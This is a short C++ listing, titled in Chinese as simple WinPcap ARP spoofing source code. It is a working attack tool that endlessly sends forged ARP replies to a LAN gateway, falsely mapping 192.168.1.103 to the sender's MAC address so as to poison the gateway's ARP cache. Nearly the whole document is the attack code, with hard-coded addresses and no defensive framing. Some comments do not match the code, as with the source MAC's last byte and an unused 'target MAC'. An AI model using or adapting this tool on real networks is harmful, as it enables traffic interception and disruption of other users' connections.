WinPcap ARP欺骗简单源码

#include <iostream> #include <pcap.h> using namespace std; #pragma pack(push,1) struct ethdr{ u_char eth_tha[6]; u_char eth_sha[6]; u_short eth_op; }; struct arp_frame{ struct ethdr eth_hdr; u_short arhp; u_short prop; u_char hlen; u_char prolen; u_short arop; u_char sha[6]; u_char spa[4]; u_char tha[6]; u_char tpa[4]; u_char padding[18]; }; #pragma pack(pop) void createARP(); struct arp_frame ARP_attacker; int main() { pcap_if_t *alldevs; pcap_if_t *p; pcap_t *ahandler; char errBuf[PCAP_BUF_SIZE]; if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errBuf) == -1) { cout << "找不到设备." << endl; exit(1); } for (p = alldevs; p; p = p->next) cout << "\t名字:" << p->name << endl << "描述:" << p->description << endl; cout << "选择网卡来发送ARP请求" << endl; int num = 0; cin >> num; int i = 0; for (p = alldevs;i < num-1; ++i, p = p->next) { if (p == NULL) { cout << "没有这样的设备存在！" << endl; pcap_freealldevs(alldevs); exit(1); } } if ((ahandler = pcap_open(p->name, 65535, PCAP_OPENFLAG_PROMISCUOUS, 1000, NULL, errBuf)) == NULL) { cout << "打开设备失败." << endl; pcap_freealldevs(alldevs); exit(1); } createARP(); u_char pdata[50],*q=(u_char*)&ARP_attacker; for (int i = 0; i < sizeof(ARP_attacker); ++i) pdata[i] = *(q++); cout << "正在发送请求..."; while (true) { if (pcap_sendpacket(ahandler, pdata, 42) != 0) { cout << "发送失败" << endl; break; } Sleep(300); } pcap_freealldevs(alldevs); return 0; } //5C-95-AE-85-76-30 目标MAC //6C-71-D9-17-D6-84 源MAC //80:89:17:ea:8b:10 网关 void createARP() { ARP_attacker.eth_hdr.eth_tha[0] = 0x80; ARP_attacker.eth_hdr.eth_tha[1] = 0x89; ARP_attacker.eth_hdr.eth_tha[2] = 0x17; ARP_attacker.eth_hdr.eth_tha[3] = 0xea; ARP_attacker.eth_hdr.eth_tha[4] = 0x8b; ARP_attacker.eth_hdr.eth_tha[5] = 0x10; ARP_attacker.eth_hdr.eth_sha[0] = 0x6c; ARP_attacker.eth_hdr.eth_sha[1] = 0x71; ARP_attacker.eth_hdr.eth_sha[2] = 0xd9; ARP_attacker.eth_hdr.eth_sha[3] = 0x17; ARP_attacker.eth_hdr.eth_sha[4] = 0xd6; ARP_attacker.eth_hdr.eth_sha[5] = 0x80; ARP_attacker.eth_hdr.eth_op = htons(0x0806); ARP_attacker.arhp = htons(0x0001); ARP_attacker.prop = htons(0x0800); ARP_attacker.hlen = 0x06; ARP_attacker.prolen = 0x04; ARP_attacker.arop = htons(0x0002); ARP_attacker.sha[0] = 0x6c; ARP_attacker.sha[1] = 0x71; ARP_attacker.sha[2] = 0xd9; ARP_attacker.sha[3] = 0x17; ARP_attacker.sha[4] = 0xd6; ARP_attacker.sha[5] = 0x80; ARP_attacker.spa[0] = 0xc0; ARP_attacker.spa[1] = 0xa8; ARP_attacker.spa[2] = 0x01; ARP_attacker.spa[3] = 0x67; ARP_attacker.tha[0] = 0x80; ARP_attacker.tha[1] = 0x89; ARP_attacker.tha[2] = 0x17; ARP_attacker.tha[3] = 0xea; ARP_attacker.tha[4] = 0x8b; ARP_attacker.tha[5] = 0x10; ARP_attacker.tpa[0] = 0xc0; ARP_attacker.tpa[1] = 0xa8; ARP_attacker.tpa[2] = 0x01; ARP_attacker.tpa[3] = 0x01; }